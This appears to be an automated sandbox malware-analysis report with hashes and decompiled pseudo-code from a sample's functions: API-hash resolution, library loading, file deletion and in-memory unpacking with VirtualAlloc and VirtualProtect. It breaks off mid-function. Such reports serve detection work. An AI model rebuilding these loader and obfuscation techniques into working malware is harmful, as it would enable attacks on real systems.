API ID: ManagerOpen
String ID: I?
API String ID: 1889721586-46180575
Opcode ID: 9f242df669841a1bb41372373475bcbcd855225c092f28871a2b0182c6a6a692
Instruction ID: 2b8ccfc94703ca5e2fef6e7725314a0039f701d46f3d96b09479f11b10a59375
Opcode Fuzzy Hash: 9f242df669841a1bb41372373475bcbcd855225c092f28871a2b0182c6a6a692
Instruction Fuzzy Hash: 1F6102B1B043409FC768AE29948573B73A6EB80714F70896DE956CB390DB34D904CF86

Uniqueness

Uniqueness Score: -1.00%

Function 02CC36B0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63
fileCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E02CC36B0(void* __ecx, void* __edi, void* __esi, void* __eflags) {
				char _v520;
				intOrPtr* _t3;
				intOrPtr* _t5;
				intOrPtr* _t7;
				int _t10;
				void* _t16;
				void* _t34;
				void* _t35;
				void* _t38;
				void* _t40;
				void* _t41;
				WCHAR* _t42;

				_t41 =  &_v520;
				_t34 = __ecx;
				_t38 = E02CC34C0(0x2ccd210);
				_t3 =  *0x2ccdc60;
				if(_t3 == 0) {
					_t3 = E02CC3E80(_t16, E02CC3F20(0xe66945e6), 0xcca28b0d, _t40);
					 *0x2ccdc60 = _t3;
				}
				 *_t3( &_v520, 0x104, _t38, _t34);
				_t5 =  *0x2ccdea8;
				_t42 = _t41 + 0x10;
				if(_t5 == 0) {
					_t5 = E02CC3E80(_t16, E02CC3F20(0xbb398380), 0x97f883e, _t40);
					 *0x2ccdea8 = _t5;
				}
				_t35 =  *_t5();
				_t7 =  *0x2cce1a0;
				if(_t7 == 0) {
					_t7 = E02CC3E80(_t16, E02CC3F20(0xbb398380), 0x26c3f343, _t40);
					 *0x2cce1a0 = _t7;
				}
				 *_t7(_t35, 0, _t38);
				if( *0x2ccdf94 == 0) {
					 *0x2ccdf94 = E02CC3E80(_t16, E02CC3F20(0xbb398380), 0x86a49eb, _t40);
				}
				_t10 = DeleteFileW(_t42); // executed
				return _t10;
			}

0x02cc36b0
0x02cc36b8
0x02cc36c4
0x02cc36c6
0x02cc36cd
0x02cc36e0
0x02cc36e5
0x02cc36e5
0x02cc36f6
0x02cc36f8
0x02cc36fd
0x02cc3702
0x02cc3715
0x02cc371a
0x02cc371a
0x02cc3721
0x02cc3723
0x02cc372a
0x02cc373d
0x02cc3742
0x02cc3742
0x02cc374b
0x02cc3756
0x02cc376e
0x02cc376e
0x02cc3777
0x02cc377f

APIs

DeleteFileW.KERNELBASE ref: 02CC3777

Strings

Ei, xrefs: 02CC36CF

Memory Dump Source

Source File: 00000000.00000002.663798235.0000000002CC1000.00000020.00000001.sdmp, Offset: 02CC0000, based on PE: true

Associated: 00000000.00000002.663785696.0000000002CC0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.663834676.0000000002CCD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.663856252.0000000002CCF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cc0000_boI88C399w.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID: Ei
API String ID: 4033686569-3988083245
Opcode ID: 5e61e4876039891981614d3e8227e93da96c9a30a606f2dff8fa0d9afea9e7cd
Instruction ID: 025d53492f86b1fc46bdea243982a475c74adf23712486eb1ea089794113e836
Opcode Fuzzy Hash: 5e61e4876039891981614d3e8227e93da96c9a30a606f2dff8fa0d9afea9e7cd
Instruction Fuzzy Hash: 1D11C1B2F002806BD714B7B8B890BAB3697ABC1244B308DBCF456C7344EE35CD129B91

Uniqueness

Uniqueness Score: -1.00%

Function 02CB00B0, Relevance: 3.1, APIs: 2, Instructions: 113memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 02CB0B50: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 02CB0B88
Part of subcall function 02CB0B50: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 02CB0BBA
Part of subcall function 02CB0B50: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 02CB0BFB

RtlMoveMemory.NTDLL(00000000,?,00000028), ref: 02CB0129
VirtualProtect.KERNEL32(00000000,?,?,00000000,?,00000000,?,00000028,?,?,?,?,?), ref: 02CB01A8

Memory Dump Source

Source File: 00000000.00000002.663754872.0000000002CB0000.00000040.00000001.sdmp, Offset: 02CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cb0000_boI88C399w.jbxd

Similarity

API ID: MemoryMove$ProtectVirtual
String ID:
API String ID: 4043890290-0
Opcode ID: 188b0fab12fc9e2f63dc8b0188fb47ecdf3ee1fa4a9327269660f04cd27d2570
Instruction ID: 7f908b9f9a7bad096911c684731f22f4907654ee59ca437d799fc780a82e7de6
Opcode Fuzzy Hash: 188b0fab12fc9e2f63dc8b0188fb47ecdf3ee1fa4a9327269660f04cd27d2570
Instruction Fuzzy Hash: E83147B329431517E32ADA69EC81BFBB3D9EFD4714F14493AF905C2180D63ED948C2A2

Uniqueness

Uniqueness Score: -1.00%

Function 02CC5CA0, Relevance: 3.0, APIs: 2, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_() {
				void* _t5;
				void* _t8;
				void* _t10;

				E02CC6530(_t8);
				if( *0x2cce094 == 0) {
					 *0x2cce094 = E02CC3E80(_t5, E02CC3F20(0xbb398380), 0xff20810a, _t10);
				}
				ExitProcess(0);
			}

0x02cc5ca0
0x02cc5cac
0x02cc5cc4
0x02cc5cc4
0x02cc5ccb

APIs

ExitProcess.KERNEL32(00000000), ref: 02CC5CCB

Memory Dump Source

Source File: 00000000.00000002.663798235.0000000002CC1000.00000020.00000001.sdmp, Offset: 02CC0000, based on PE: true

Associated: 00000000.00000002.663785696.0000000002CC0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.663834676.0000000002CCD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.663856252.0000000002CCF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cc0000_boI88C399w.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 451966cfe4d20562fdd45ce1cadf715516195de16e95d6c55641feb6904c6f54
Instruction ID: 1b996e02bf31ce6a15a9992b0746299232d99242e3c75abe76c090d80e7b770c
Opcode Fuzzy Hash: 451966cfe4d20562fdd45ce1cadf715516195de16e95d6c55641feb6904c6f54
Instruction Fuzzy Hash: ECD01231B4178096E7007AB4795076B25574FC0740F308C5DF906CB288EF6198117BD2

Uniqueness

Uniqueness Score: -1.00%

Function 02CB0700, Relevance: 2.7, APIs: 2, Instructions: 175memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 02CB0B50: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 02CB0B88
Part of subcall function 02CB0B50: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 02CB0BBA
Part of subcall function 02CB0B50: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 02CB0BFB

VirtualAlloc.KERNEL32(?,?,00000000), ref: 02CB082F

Memory Dump Source

Source File: 00000000.00000002.663754872.0000000002CB0000.00000040.00000001.sdmp, Offset: 02CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cb0000_boI88C399w.jbxd

Similarity

API ID: MemoryMove$AllocVirtual
String ID:
API String ID: 1654584625-0
Opcode ID: 6f0421d4919e499df623a72a2ee0775d879b43e4296be54090a6b12650a6662d
Instruction ID: 4eb71679d7d7b3256cc6980d0faa5611295e7cee72907800656f03c9417521da
Opcode Fuzzy Hash: 6f0421d4919e499df623a72a2ee0775d879b43e4296be54090a6b12650a6662d
Instruction Fuzzy Hash: 8351D0B1A40219AFDB258B55CC85FEBB7A8EF44B01F0044A5F648B7190E7B49E84CFE5

Uniqueness

Uniqueness Score: -1.00%

Function 02CC6FB0, Relevance: 1.6, APIs: 1, Instructions: 107
libraryCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E02CC6FB0(void* __ebx) {
				void* _t2;
				struct HINSTANCE__* _t5;
				intOrPtr* _t6;
				intOrPtr* _t8;
				void* _t21;
				void* _t48;
				WCHAR* _t51;
				void* _t53;
				void* _t54;
				void* _t55;

				_t21 = __ebx;
				_t2 = 0x2f7561b9;
				goto L1;
				do {
					while(1) {
						L1:
						_t54 = _t2 - 0x16eb9dc5;
						if(_t54 > 0) {
							break;
						}
						if(_t54 == 0) {
							E02CC6F10(_t21, 0x2ccd770, 4, __eflags);
							_t2 = 0x28da268b;
							continue;
						} else {
							_t55 = _t2 - 0x96aa655;
							if(_t55 > 0) {
								__eflags = _t2 - 0x129c963b;
								if(__eflags != 0) {
									goto L21;
								} else {
									E02CC6F10(_t21, 0x2ccd7c0, 3, __eflags);
									_t2 = 0x16eb9dc5;
									continue;
								}
							} else {
								if(_t55 == 0) {
									E02CC6F10(_t21, 0x2ccd840, 1, __eflags);
									_t2 = 0x6462a46;
									continue;
								} else {
									if(_t2 == 0x34398df) {
										E02CC6F10(_t21, 0x2ccd820, 0, __eflags);
										_t2 = 0x96aa655;
										continue;
									} else {
										_t57 = _t2 - 0x6462a46;
										if(_t2 != 0x6462a46) {
											goto L21;
										} else {
											E02CC6F10(_t21, 0x2ccd890, 2, _t57);
											_t2 = 0x129c963b;
											continue;
										}
									}
								}
							}
						}
						L30:
					}
					__eflags = _t2 - 0x2cd0d411;
					if(__eflags > 0) {
						__eflags = _t2 - 0x2f7561b9;
						if(__eflags != 0) {
							goto L21;
						} else {
							_t2 = 0x34398df;
							goto L1;
						}
					} else {
						if(__eflags == 0) {
							_t51 = E02CC34C0(0x2ccd7f0);
							__eflags =  *0x2ccddc4;
							if( *0x2ccddc4 == 0) {
								 *0x2ccddc4 = E02CC3E80(_t21, E02CC3F20(0xbb398380), 0x9261db99, _t53);
							}
							_t5 = LoadLibraryW(_t51); // executed
							 *( *0x2cce2e8 + 0x28) = _t5;
							_t6 =  *0x2ccdea8;
							__eflags = _t6;
							if(_t6 == 0) {
								_t6 = E02CC3E80(_t21, E02CC3F20(0xbb398380), 0x97f883e, _t53);
								 *0x2ccdea8 = _t6;
							}
							_t48 =  *_t6();
							_t8 =  *0x2cce1a0;
							__eflags = _t8;
							if(_t8 == 0) {
								_t8 = E02CC3E80(_t21, E02CC3F20(0xbb398380), 0x26c3f343, _t53);
								 *0x2cce1a0 = _t8;
							}
							return  *_t8(_t48, 0, _t51);
						} else {
							__eflags = _t2 - 0x17b18c59;
							if(__eflags == 0) {
								E02CC6F10(_t21, 0x2ccd870, 6, __eflags);
								_t2 = 0x2cd0d411;
								goto L1;
							} else {
								__eflags = _t2 - 0x28da268b;
								if(__eflags != 0) {
									goto L21;
								} else {
									E02CC6F10(_t21, 0x2ccd790, 5, __eflags);
									_t2 = 0x17b18c59;
									goto L1;
								}
							}
						}
					}
					goto L30;
					L21:
					__eflags = _t2 - 0x2a0eb481;
				} while (__eflags != 0);
				return _t2;
				goto L30;
			}

0x02cc6fb0
0x02cc6fb0
0x02cc6fb0
0x02cc6fb5
0x02cc6fb5
0x02cc6fb5
0x02cc6fb5
0x02cc6fba
0x00000000
0x00000000
0x02cc6fc0
0x02cc704a
0x02cc704f
0x00000000
0x02cc6fc2
0x02cc6fc2
0x02cc6fc7
0x02cc701c
0x02cc7021
0x00000000
0x02cc7027
0x02cc7031
0x02cc7036
0x00000000
0x02cc7036
0x02cc6fc9
0x02cc6fc9
0x02cc7010
0x02cc7015
0x00000000
0x02cc6fcb
0x02cc6fd0
0x02cc6ffa
0x02cc6fff
0x00000000
0x02cc6fd2
0x02cc6fd2
0x02cc6fd7
0x00000000
0x02cc6fdd
0x02cc6fe7
0x02cc6fec
0x00000000
0x02cc6fec
0x02cc6fd7
0x02cc6fd0
0x02cc6fc9
0x02cc6fc7
0x00000000
0x02cc6fc0
0x02cc7059
0x02cc705e
0x02cc70a2
0x02cc70a7
0x00000000
0x02cc70a9
0x02cc70a9
0x00000000
0x02cc70a9
0x02cc7060
0x02cc7060
0x02cc70cb
0x02cc70d2
0x02cc70d4
0x02cc70ec
0x02cc70ec
0x02cc70f2
0x02cc70fa
0x02cc70fd
0x02cc7102
0x02cc7104
0x02cc7117
0x02cc711c
0x02cc711c
0x02cc7123
0x02cc7125
0x02cc712a
0x02cc712c
0x02cc713f
0x02cc7144
0x02cc7144
0x02cc7151
0x02cc7062
0x02cc7062
0x02cc7067
0x02cc7093
0x02cc7098
0x00000000
0x02cc7069
0x02cc7069
0x02cc706e
0x00000000
0x02cc7070
0x02cc707a
0x02cc707f
0x00000000
0x02cc707f
0x02cc706e
0x02cc7067
0x02cc7060
0x00000000
0x02cc70b3
0x02cc70b3
0x02cc70b3
0x02cc70be
0x00000000

APIs

LoadLibraryW.KERNELBASE(00000000,?,2564BE4F,02CC68DC), ref: 02CC70F2

Memory Dump Source

Source File: 00000000.00000002.663798235.0000000002CC1000.00000020.00000001.sdmp, Offset: 02CC0000, based on PE: true

Associated: 00000000.00000002.663785696.0000000002CC0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.663834676.0000000002CCD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.663856252.0000000002CCF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cc0000_boI88C399w.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: b65487a2d93cc227c66fc761a5110bbe52d89cb161fd2ea3fbf15fd509e42104
Instruction ID: cdc3775f086cd43e5942e6fdc80e90e98082310a8e88421fc8c6df27fbaa629e
Opcode Fuzzy Hash: b65487a2d93cc227c66fc761a5110bbe52d89cb161fd2ea3fbf15fd509e42104
Instruction Fuzzy Hash: 4C31AF61B041415B9A286A796A9037B915FDBC1264F34486EF407CB348CE67CE45AFD3

Uniqueness

Uniqueness Score: -1.00%

Function 02CC6F10, Relevance: 1.5, APIs: 1, Instructions: 45
libraryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E02CC6F10(void* __ebx, void* __ecx, signed int __edx, void* __eflags) {
				struct HINSTANCE__* _t6;
				intOrPtr* _t7;
				intOrPtr* _t9;
				signed int _t28;
				void* _t29;
				WCHAR* _t30;
				void* _t31;

				_t15 = __ebx;
				_t28 = __edx;
				_t30 = E02CC34C0(__ecx);
				if( *0x2ccddc4 == 0) {
					 *0x2ccddc4 = E02CC3E80(__ebx, E02CC3F20(0xbb398380), 0x9261db99, _t31);
				}
				_t6 = LoadLibraryW(_t30); // executed
				 *( *0x2cce2e8 + 0xc + _t28 * 4) = _t6;
				_t7 =  *0x2ccdea8;
				if(_t7 == 0) {
					_t7 = E02CC3E80(_t15, E02CC3F20(0xbb398380), 0x97f883e, _t31);
					 *0x2ccdea8 = _t7;
				}
				_t29 =  *_t7();
				_t9 =  *0x2cce1a0;
				if(_t9 == 0) {
					_t9 = E02CC3E80(_t15, E02CC3F20(0xbb398380), 0x26c3f343, _t31);
					 *0x2cce1a0 = _t9;
				}
				return  *_t9(_t29, 0, _t30);
			}

0x02cc6f10
0x02cc6f12
0x02cc6f19
0x02cc6f22
0x02cc6f3a
0x02cc6f3a
0x02cc6f40
0x02cc6f48
0x02cc6f4c
0x02cc6f53
0x02cc6f66
0x02cc6f6b
0x02cc6f6b
0x02cc6f72
0x02cc6f74
0x02cc6f7b
0x02cc6f8e
0x02cc6f93
0x02cc6f93
0x02cc6fa0

APIs

LoadLibraryW.KERNELBASE(00000000,?,2564BE4F,02CC704F,02CC68DC), ref: 02CC6F40

Memory Dump Source

Source File: 00000000.00000002.663798235.0000000002CC1000.00000020.00000001.sdmp, Offset: 02CC0000, based on PE: true

Associated: 00000000.00000002.663785696.0000000002CC0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.663834676.0000000002CCD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.663856252.0000000002CCF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cc0000_boI88C399w.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 45c067102ea55c110468755860e9cdc7c7659819f16099ea309d626d3c8a7ab3
Instruction ID: 296940dbe46284777d43dd4456178bad3a268f446102892845f592670e702a8e
Opcode Fuzzy Hash: 45c067102ea55c110468755860e9cdc7c7659819f16099ea309d626d3c8a7ab3
Instruction Fuzzy Hash: DB01AD72F01241AF9714BBB8B89076B27AB9BC12847348DBCF406CB344EA31DC129B91

Uniqueness

Uniqueness Score: -1.00%

Function 004021E4, Relevance: 1.5, APIs: 1, Instructions: 40COMMON

Download Yara Rule

APIs

#100.MSVBVM60(004022F0), ref: 004021E9

Memory Dump Source

Source File: 00000000.00000002.660946211.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.660941226.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661050174.0000000000460000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.661056537.0000000000461000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.661067161.000000000046C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661073801.000000000046E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661079197.0000000000470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661088372.0000000000484000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_boI88C399w.jbxd

Similarity

API ID: #100
String ID:
API String ID: 1341478452-0
Opcode ID: a19883fbefb34a626b471dbbd84d85fed867630d971e34144c30d5582fe4778b
Instruction ID: 95e335cc83654aa6da8bb2abc1ce78c56961ed2133ddbdbe464b947a4c3f2c01
Opcode Fuzzy Hash: a19883fbefb34a626b471dbbd84d85fed867630d971e34144c30d5582fe4778b
Instruction Fuzzy Hash: 3B0132A244E3C24FD34757704A69281BFB09E23564B1E01EBC1D1CF4E3D29C494AD723

Uniqueness

Uniqueness Score: -1.00%

Function 02CC42F0, Relevance: 1.5, APIs: 1, Instructions: 30
memoryCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E02CC42F0(void* __ebx, long __ecx) {
				intOrPtr* _t1;
				void* _t4;
				void* _t16;
				long _t17;
				void* _t18;

				_t8 = __ebx;
				_t1 =  *0x2ccdea8;
				_t17 = __ecx;
				if(_t1 == 0) {
					_t1 = E02CC3E80(__ebx, E02CC3F20(0xbb398380), 0x97f883e, _t18);
					 *0x2ccdea8 = _t1;
				}
				_t16 =  *_t1();
				if( *0x2ccdcec == 0) {
					 *0x2ccdcec = E02CC3E80(_t8, E02CC3F20(0xbb398380), 0xe9233692, _t18);
				}
				_t4 = RtlAllocateHeap(_t16, 8, _t17); // executed
				return _t4;
			}

0x02cc42f0
0x02cc42f0
0x02cc42f6
0x02cc42fb
0x02cc430e
0x02cc4313
0x02cc4313
0x02cc431a
0x02cc4323
0x02cc433b
0x02cc433b
0x02cc4344
0x02cc4348

APIs

RtlAllocateHeap.NTDLL(00000000,00000008,00000480), ref: 02CC4344

Memory Dump Source

Source File: 00000000.00000002.663798235.0000000002CC1000.00000020.00000001.sdmp, Offset: 02CC0000, based on PE: true

Associated: 00000000.00000002.663785696.0000000002CC0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.663834676.0000000002CCD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.663856252.0000000002CCF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cc0000_boI88C399w.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: d1ddc2b23c94f5f5f09df72d8eaedc7fa330bbf7973647e64568cd494903438c
Instruction ID: 6e5989a39d670d87dfcb7b2b28ad43512ca01c25ffe767e51c7a22e0c0b4d0c3
Opcode Fuzzy Hash: d1ddc2b23c94f5f5f09df72d8eaedc7fa330bbf7973647e64568cd494903438c
Instruction Fuzzy Hash: 04E065B2B411426B9B18A6B9B4647AB26ABABC1680334C9BDF406C7344EE708D025BD1

Uniqueness

Uniqueness Score: -1.00%

Function 02CB0010, Relevance: 1.3, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

Part of subcall function 02CB0B50: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 02CB0B88
Part of subcall function 02CB0B50: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 02CB0BBA
Part of subcall function 02CB0B50: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 02CB0BFB

Part of subcall function 02CB0990: VirtualAlloc.KERNEL32(?,?,00000000), ref: 02CB09E6
Part of subcall function 02CB0990: RtlMoveMemory.NTDLL(00000000,?,?), ref: 02CB09F5
Part of subcall function 02CB0990: RtlMoveMemory.NTDLL(00000000,?,00000028), ref: 02CB0A26
Part of subcall function 02CB0990: VirtualAlloc.KERNEL32(?,?,00000000), ref: 02CB0A41
Part of subcall function 02CB0990: RtlMoveMemory.NTDLL(00000000,?,?), ref: 02CB0A6E
Part of subcall function 02CB0990: RtlFillMemory.KERNEL32(00000000,?,00000000), ref: 02CB0A8B

Part of subcall function 02CB01F0: GetCurrentProcess.KERNEL32(?,?), ref: 02CB0238
Part of subcall function 02CB01F0: NtQueryInformationProcess.NTDLL(00000000,00000000,00000000,00000018,?), ref: 02CB0253
Part of subcall function 02CB01F0: GetProcessHeap.KERNEL32(?,?,?), ref: 02CB026E
Part of subcall function 02CB01F0: HeapFree.KERNEL32(00000000,00000001,00000000,?,?,?), ref: 02CB0277
Part of subcall function 02CB01F0: GetProcessHeap.KERNEL32(?,?,?), ref: 02CB027C
Part of subcall function 02CB01F0: RtlAllocateHeap.NTDLL(00000000,00000001,?), ref: 02CB0289
Part of subcall function 02CB01F0: GetCurrentProcess.KERNEL32(?,?,?), ref: 02CB0290
Part of subcall function 02CB01F0: NtQueryInformationProcess.NTDLL(00000000,00000000,00000000,?,?), ref: 02CB02A3
Part of subcall function 02CB01F0: RtlMoveMemory.NTDLL(00000000,00000000,00000018), ref: 02CB02CA
Part of subcall function 02CB01F0: RtlMoveMemory.NTDLL(00000000,?,00000014), ref: 02CB02E1
Part of subcall function 02CB01F0: RtlMoveMemory.NTDLL(?,00000000,00000014), ref: 02CB0303

VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,?,?,?,?), ref: 02CB008E

Memory Dump Source

Source File: 00000000.00000002.663754872.0000000002CB0000.00000040.00000001.sdmp, Offset: 02CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cb0000_boI88C399w.jbxd

Similarity

API ID: Memory$Move$Process$Heap$Virtual$AllocCurrentFreeInformationQuery$AllocateFill
String ID:
API String ID: 3609892891-0
Opcode ID: db14c8e7be463ca880be51c24ceba23fe284fb317b28796201c3a9830a12affd
Instruction ID: f57eb7bc2cd93fdb049d8c46bcbd942603d1e2cad1066746d879e4bcd5292d8d
Opcode Fuzzy Hash: db14c8e7be463ca880be51c24ceba23fe284fb317b28796201c3a9830a12affd
Instruction Fuzzy Hash: 38015E79608301BBD612EB64CC81FEFB7EEAFC4340F00891DB18897240DA74E9459FA6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00451D80, Relevance: 40.9, APIs: 27, Instructions: 388COMMON

Download Yara Rule

APIs

Part of subcall function 00461600: __vbaNew2.MSVBVM60(00405960,0046C010,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 0046164A
Part of subcall function 00461600: __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461669
Part of subcall function 00461600: __vbaNew2.MSVBVM60(00405960,0046C010,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461680
Part of subcall function 00461600: __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461699
Part of subcall function 00461600: __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000188,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004616BC
Part of subcall function 00461600: __vbaObjSet.MSVBVM60(?,?), ref: 004616D3
Part of subcall function 00461600: __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000064), ref: 004616E9
Part of subcall function 00461600: __vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 004616FD

__vbaObjSet.MSVBVM60(?,00000000), ref: 00451E26
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,000000E0), ref: 00451E4D
__vbaSetSystemError.MSVBVM60(?,00000000,00000000), ref: 00451E6C
__vbaFreeObj.MSVBVM60 ref: 00451E7B
_adj_fdiv_m64.MSVBVM60 ref: 00451F24
__vbaFpI4.MSVBVM60 ref: 00451F33
_adj_fdiv_m64.MSVBVM60 ref: 00451F81
__vbaFpI4.MSVBVM60 ref: 00451F90
_adj_fdiv_m64.MSVBVM60 ref: 00451FE2
__vbaFpI4.MSVBVM60 ref: 00451FF1
#588.MSVBVM60(00000000,00000000,00000000), ref: 00452009
_adj_fdiv_m64.MSVBVM60 ref: 004520B0
__vbaFpI4.MSVBVM60 ref: 004520BF
#588.MSVBVM60(00000000,00000000,00000000), ref: 004520CF
__vbaObjSet.MSVBVM60(?,00000000), ref: 004520EB
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,000000E0), ref: 00452112
__vbaSetSystemError.MSVBVM60(?,00000000,00000000,00000000), ref: 00452135
__vbaFreeObj.MSVBVM60 ref: 0045213E
__vbaObjSet.MSVBVM60(?,00000000), ref: 004521B6
__vbaLateIdSt.MSVBVM60(00000000), ref: 004521BD
__vbaFreeObj.MSVBVM60 ref: 004521C6
__vbaObjSet.MSVBVM60(?,00000000), ref: 004521F8
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000264), ref: 00452217
__vbaFreeObj.MSVBVM60 ref: 00452226
__vbaObjSet.MSVBVM60(?,00000000), ref: 00452255
__vbaLateIdSt.MSVBVM60(00000000), ref: 00452258
__vbaFreeObj.MSVBVM60 ref: 00452261

Memory Dump Source

Source File: 00000000.00000002.660946211.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.660941226.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661050174.0000000000460000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.661056537.0000000000461000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.661067161.000000000046C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661073801.000000000046E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661079197.0000000000470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661088372.0000000000484000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_boI88C399w.jbxd

Similarity

API ID: __vba$Free$CheckHresult$_adj_fdiv_m64$#588ErrorLateNew2System$List
String ID:
API String ID: 3605595106-0
Opcode ID: 4431cbdca038ca7eb302088a2884ebf1f5290f73126512e73fa802d701bb4bb2
Instruction ID: 3aec95be287006748ca62a40571063f4abcc16667d329b76d44f1ff74daa8e65
Opcode Fuzzy Hash: 4431cbdca038ca7eb302088a2884ebf1f5290f73126512e73fa802d701bb4bb2
Instruction Fuzzy Hash: 96E1C271A00205DBCB04DFB4DD85AAABBB5FB49301F04827AE945E33B1E7749845CF59

Uniqueness

Uniqueness Score: -1.00%

Function 02CC7740, Relevance: 6.5, Strings: 5, Instructions: 224
COMMONCrypto

Download Yara Rule

C-Code - Quality: 60%

			E02CC7740() {
				void* __ebx;
				void* __ebp;
				intOrPtr* _t84;
				signed int _t85;
				signed int _t89;
				intOrPtr* _t91;
				intOrPtr* _t93;
				intOrPtr* _t95;
				intOrPtr* _t97;
				void* _t101;
				signed int _t106;
				void* _t117;
				intOrPtr* _t147;
				intOrPtr _t149;
				intOrPtr* _t152;
				intOrPtr _t158;
				short* _t160;
				void* _t164;
				void* _t166;
				void* _t172;
				void* _t177;
				void* _t179;

				 *(_t177 + 0x14) = 0xad9f;
				 *(_t177 + 0x14) =  *(_t177 + 0x14) | 0x55c37b00;
				 *(_t177 + 0x14) =  *(_t177 + 0x14) ^ 0xd5c3ff9e;
				 *(_t177 + 0x10) = 0x20cd;
				 *(_t177 + 0x10) =  *(_t177 + 0x10) << 9;
				 *(_t177 + 0x10) =  *(_t177 + 0x10) ^ 0x00419a00;
				 *(_t177 + 4) = 0x7d7a;
				_push(_t117);
				 *(_t177 + 0x14) =  *(_t177 + 4) * 0x25;
				_t172 = 0;
				 *(_t177 + 0x14) =  *(_t177 + 0x14) >> 0xa;
				_t164 = 0x37433c74;
				 *(_t177 + 0x14) =  *(_t177 + 0x14) | 0x2c89345e;
				 *(_t177 + 0x14) =  *(_t177 + 0x14) << 7;
				 *(_t177 + 0x14) =  *(_t177 + 0x14) << 7;
				 *(_t177 + 0x14) =  *(_t177 + 0x14) ^ 0x4d378000;
				 *(_t177 + 0x18) = 0xca95;
				 *(_t177 + 0x18) =  *(_t177 + 0x18) + 0xcbf5;
				 *(_t177 + 0x18) =  *(_t177 + 0x18) | 0x7c83d5b7;
				 *(_t177 + 0x18) =  *(_t177 + 0x18) ^ 0x6758ba30;
				 *(_t177 + 0x18) =  *(_t177 + 0x18) ^ 0x1bdb6d8d;
				 *(_t177 + 0x10) = 0xd33c;
				 *(_t177 + 0x10) =  *(_t177 + 0x10) << 9;
				_t158 =  *((intOrPtr*)(_t177 + 0x2c));
				 *(_t177 + 0x10) = 0x38e38e39 *  *(_t177 + 0x10) >> 0x20 >> 1;
